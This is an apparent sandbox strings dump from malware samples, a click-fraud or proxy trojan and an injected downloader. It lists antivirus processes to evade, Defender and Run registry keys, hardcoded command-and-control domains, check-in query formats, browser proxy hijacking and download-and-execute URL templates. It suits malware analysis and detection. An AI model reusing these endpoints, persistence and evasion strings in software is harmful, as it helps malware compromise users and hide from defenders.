3R2R.exe_1728_rwx_00400000_00068000:
`.rsrc
`.rsrc
PSSh$
PSSh$
SSShbU@
SSShbU@
SSj%S
SSj%S
<%u,V
<%u,V
<3%u1f
<3%u1f
GetProcessWindowStation
GetProcessWindowStation
operator
operator
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
1.2.5
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\sc.exe
\sc.exe
ntdll.dll
ntdll.dll
iexplore.exe
iexplore.exe
opera.exe
opera.exe
firefox.exe
firefox.exe
safari.exe
safari.exe
chrome.exe
chrome.exe
AVGIDSMonitor.exe
AVGIDSMonitor.exe
AVGIDSAgent.exe
AVGIDSAgent.exe
avgchsvx.exe
avgchsvx.exe
avgemcx.exe
avgemcx.exe
avgnsx.exe
avgnsx.exe
avgrsx.exe
avgrsx.exe
avgtray.exe
avgtray.exe
avgwdsvc.exe
avgwdsvc.exe
avgnt.exe
avgnt.exe
ccsvchst.exe
ccsvchst.exe
AvastUI.exe
AvastUI.exe
mcagent.exe
mcagent.exe
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows Defender
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
explorer.exe
explorer.exe
Windows Security Center
Windows Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
%s\shell32.dll,Control_RunDLL "%s\wscui.cpl",Security Center
rundll32.exe
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
Windows Defender
at %d:%d "%s" %s
at %d:%d "%s" %s
win32iexplore.exe
win32iexplore.exe
win32opera.exe
win32opera.exe
win32firefox.exe
win32firefox.exe
win32safari.exe
win32safari.exe
win32winword.exe
win32winword.exe
win32excel.exe
win32excel.exe
win32outlook.exe
win32outlook.exe
win32photoshop.exe
win32photoshop.exe
win32wmplayer.exe
win32wmplayer.exe
win32java.exe
win32java.exe
win32itunes.exe
win32itunes.exe
win32msmsgs.exe
win32msmsgs.exe
java.exe
java.exe
*.log
*.log
%s:\windows\system32\%s.tmp
%s:\windows\system32\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\windows\syswow64\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\system32\%s.tmp
%s:\WINNT\syswow64\%s.tmp
%s:\WINNT\syswow64\%s.tmp
Find Temporary files is %d
Find Temporary files is %d
cannot open files %s, Open next files ?
cannot open files %s, Open next files ?
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
{A1D429DE-B782-4253-84AD-6E09A8438AD5}
\Windows NT
\Windows NT
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
%s\%s
%s\%s
%s.%s
%s.%s
stor.cfg
stor.cfg
exec%s
exec%s
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
lvvm.exe
lvvm.exe
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
Advapi32.dll
Advapi32.dll
%s%s_1
%s%s_1
%s_0_%d_%s
%s_0_%d_%s
%s_%d
%s_%d
%s_%d_%d_%d_%d
%s_%d_%d_%d_%d
%s_%s
%s_%s
http://
http://
POST %s HTTP/1.1
POST %s HTTP/1.1
Host: %s
Host: %s
User-Agent: mozilla/2.0
User-Agent: mozilla/2.0
Content-Length: %u
Content-Length: %u
POST http://%s%s HTTP/1.1
POST http://%s%s HTTP/1.1
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/1.1 200 OK
HTTP/1.1 200 OK
%s?tq=%s
%s?tq=%s
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111
id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=111
%s_%s_%d
%s_%s_%d
_1_%d
_1_%d
_2_%d
_2_%d
_3_%d
_3_%d
_4_%d
_4_%d
http://worldorderlive.com
http://worldorderlive.com
http://rumperstumprs.com
http://rumperstumprs.com
http://transaerosystems.com
http://transaerosystems.com
http://freeridershools.com
http://freeridershools.com
http://ourbigdrophills.com
http://ourbigdrophills.com
http://mydbonlineaccess.com
http://mydbonlineaccess.com
http://onlinepdahelpforyou.com
http://onlinepdahelpforyou.com
http://remarkreddomas.com
http://remarkreddomas.com
http://transfersakkonline.com
http://transfersakkonline.com
http://backupdomaintolevel.com
http://backupdomaintolevel.com
SELECT_RESERV_SRV_%d
SELECT_RESERV_SRV_%d
%s_%d_%s
%s_%d_%s
id=%s&c=%d
id=%s&c=%d
%s_%d_%d_%d
%s_%d_%d_%d
%s_%d_%d
%s_%d_%d
%s %s
%s %s
%s start%s%c%s
%s start%s%c%s
c1.exe
c1.exe
c2.exe
c2.exe
c3.exe
c3.exe
DWN_CON_STRP_%d_%s
DWN_CON_STRP_%d_%s
http://%d.ctrl.%s
http://%d.ctrl.%s
logo.png
logo.png
img/135.png
img/135.png
img/136.png
img/136.png
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
t=%s&q=&s=%d&hrs=%d
%s/%s?tq=%s&pr=%d
%s/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
%s:%d/%s?tq=%s&pr=%d
http://armoredlegion.com/305986.png
http://armoredlegion.com/305986.png
http://armoredlegion.com/16354.png
http://armoredlegion.com/16354.png
http://armoredlegion.com/716354_m61.png
http://armoredlegion.com/716354_m61.png
http://mektek.net/thelab/wiley.jpg
http://mektek.net/thelab/wiley.jpg
http://knowledgesutra.com/img/temp/hi.cgi
http://knowledgesutra.com/img/temp/hi.cgi
http://knowledgesutra.com/img/temp/head.png
http://knowledgesutra.com/img/temp/head.png
http://battleon.com/134.gif
http://battleon.com/134.gif
http://battleon.com/132.gif
http://battleon.com/132.gif
http://battleon.com/133.gif
http://battleon.com/133.gif
http://browsermmorpg.com/images/cpc.png
http://browsermmorpg.com/images/cpc.png
http://browsermmorpg.com/images/cpc2.png
http://browsermmorpg.com/images/cpc2.png
http://browsermmorpg.com/img/intel.gif
http://browsermmorpg.com/img/intel.gif
http://browsermmorpg.com/img/intel.jpg
http://browsermmorpg.com/img/intel.jpg
http://012webpages.com/christian12.jpg
http://012webpages.com/christian12.jpg
http://012webpages.com/christian13.jpg
http://012webpages.com/christian13.jpg
http://012webpages.com/christian14.jpg
http://012webpages.com/christian14.jpg
http://tri-countymech.com/g/livechat.png
http://tri-countymech.com/g/livechat.png
http://tri-countymech.com/g/logo.png
http://tri-countymech.com/g/logo.png
http://tri-countymech.com/g/133.jpg
http://tri-countymech.com/g/133.jpg
http://tri-countymech.com/g/134.jpg
http://tri-countymech.com/g/134.jpg
http://electronicstheory.com/pics/valley.png
http://electronicstheory.com/pics/valley.png
http://electronicstheory.com/pics/sun.png
http://electronicstheory.com/pics/sun.png
http://classicbattletech.com/lhous3.gif
http://classicbattletech.com/lhous3.gif
http://classicbattletech.com/lhous4.gif
http://classicbattletech.com/lhous4.gif
http://classicbattletech.com/lhous5.gif
http://classicbattletech.com/lhous5.gif
http://classicbattletech.com/lhous6.gif
http://classicbattletech.com/lhous6.gif
http://engineeringcrossing.com/images/misc/23525.png
http://engineeringcrossing.com/images/misc/23525.png
http://engineeringcrossing.com/images/misc/64646.png
http://engineeringcrossing.com/images/misc/64646.png
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=t&hrs=%d&q=id=1000&ver=%s&s=%d
t=ip&hrs=%d&q=&s=1
t=ip&hrs=%d&q=&s=1
%s?pr=%s
%s?pr=%s
\bl%d_64.bat
\bl%d_64.bat
del "%s"
del "%s"
if exist "%s" goto a
if exist "%s" goto a
cmd.exe /c "%s"
cmd.exe /c "%s"
%s.zl
%s.zl
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
GET %s HTTP/1.0
GET %s HTTP/1.0
http://xprstats.com/images/logo.png
http://xprstats.com/images/logo.png
drweb
drweb
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d
t=ml&q=%s
t=ml&q=%s
xprstats.com
xprstats.com
http://%s%s
http://%s%s
ldr.ini
ldr.ini
reportfrommains.com
reportfrommains.com
http://%s/s.php?c=121&id=%s
http://%s/s.php?c=121&id=%s
onlinereportsystem.com
onlinereportsystem.com
%s_1_%d_%s
%s_1_%d_%s
%s_2_%d_%s
%s_2_%d_%s
%s_3_%d_%s
%s_3_%d_%s
%s_4_%d_%s
%s_4_%d_%s
pmv=2&id=%s&hwid=%s
pmv=2&id=%s&hwid=%s
u.exe
u.exe
%s up%s
%s up%s
&%s=%s
&%s=%s
PRM_LSTN_THIS_PORT
PRM_LSTN_THIS_PORT
127.0.0.1
127.0.0.1
HTTP/1.x
HTTP/1.x
google.com
google.com
http://www.google.com
http://www.google.com
HTTP/1.1 302 Found
HTTP/1.1 302 Found
Location: %s
Location: %s
id=%s&type=%d&ppcid=%s
%s: %s
%s_5_%s
http=127.0.0.1:
prefs.js
Mozilla
"network.proxy.http"
"network.proxy.http_port"
"network.proxy.type"
"127.0.0.1"
%s(%s, %s);
operaprefs.ini
Opera
Use HTTP
HTTP server
127.0.0.1:%s
%s=%s
%s:%s
hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s
id=%s&hwid=%s
exec|%s
http=
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
bing.com
yahoo.com
search.aol.
suche.aol.
searcht2.aol.
.yimg.com
.bing.net
scorecardresearch.com
brightcove.com
.aol.
.atwola.
.ivwbox.
.atdmt.
.abmr.
.tacoda.
.adtechus.
.autodatadirect.
.mapquestapi.
.ggpht.
.virtualearth.
.opera.
.microsoft.
.wsod.
.doubleclick.
.ypcdn.
.truveo.
.tlowdb.
mapq.st
.dartsearch.
.thawte.
http://
bing.com/search
search.yahoo.com/search
%s_1_%s
err%d%s_%d_%d
err0%s_%d_%d
ver=111&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d
%s:443/%s
%s_2_%s
%s_%s_%s
%s_3_%s
www.www.ru
https://
.doubleclick.net
doubleclick.net
msn.com
%s_0%d_%d
=='undefined'?'%s':'%s'
.referrer
HTTP/1.0
User-Agent: chrome/9.0
%s %s %s
http://www.google.com/
http://www.yahoo.com/
.class
.midi
google_ad.url
google_ad.title
r.msn.com
google_ad.line1
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\3R2R.exe
%Program Files%\C6249
%Documents and Settings%\%current user%\Application Data\649C6
%Program Files%\LP\4566
.text
`.rdata
@.data
.rsrc
IPHLPAPI.DLL
EnumChildWindows
newdev.dll
SHELL32.dll
SETUPAPI.dll
MPRAPI.dll
KERNEL32.dll
GetCPInfo
GetProcessHeap
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegFlushKey
ShellExecuteA
SHDeleteKeyA
keybd_event
EnumWindows
WinHttpOpenRequest
WinHttpQueryDataAvailable
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpOpen
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
RASAPI32.dll
RPCRT4.dll
SHLWAPI.dll
USER32.dll
WINHTTP.dll
WININET.dll
WS2_32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Registry\Machine\System\CurrentControlSet\Services\%s
Dr.Web
mhttp=127.0.0.1:%d
http://www.yahoo.com
2.0.2.1
Explorer.EXE_1644_rwx_01370000_0000A000:
ver76%sdhpj
SafariChromeFi~
%sdhpjelxr.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d
Chrome
Firefox
Opera
%sgkih.exe
%subsnltn.php?adv=adv401&id=%d&c=%d
%sdesk.exe
%sjnupkvq.php?adv=adv401&id=%d&c=%d
%splmnimmi.exe
%srvdojqpje.php?adv=adv401&id=%d&c=%d
%snkamk.exe
%sevpxez.php?adv=adv401&id=%d&c=%d
%sgywaume.exe
%simgbidoje.php?adv=adv401&id=%d&c=%d
%snildxk.exe
%sarzgbzhf.php?adv=adv401&id=%d&c=%d
%ssqpvrlh.exe
%sizucahpkip.php?adv=adv401&id=%d&c=%d
%scmameeao.exe
%snvmkfmhfa.php?adv=adv401&id=%d&c=%d
%smuis.exe
%sjwezxfzk.php?adv=adv401&id=%d&c=%d
%sdsdfca.exe
%swqtkipkiqk.php?adv=adv401&id=%d&c=%d
%suxwdet.exe
%szdlfahcaip.php?adv=adv401&id=%d&c=%d
%sctbidkjq.php?adv=adv401&id=%d&c=%d
http://bascheme.com/dpxezto/
http://aahacker.com/dpxezto/
psapi.dll
ddraw.dll
urlmon.dll
shell32.dll
kernel32.dll
user32.dll
wininet.dll
ntdll.dll
\svchost.exe
explorer.exe
C:\DOCUME~1\test\LOCALS~1\Temp\nsp4.tmp\2 Gansta.exe
ShellExecuteExA
InternetOpenUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ADVAPI32.dll
DDRAW.dll
PSAPI.DLL
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll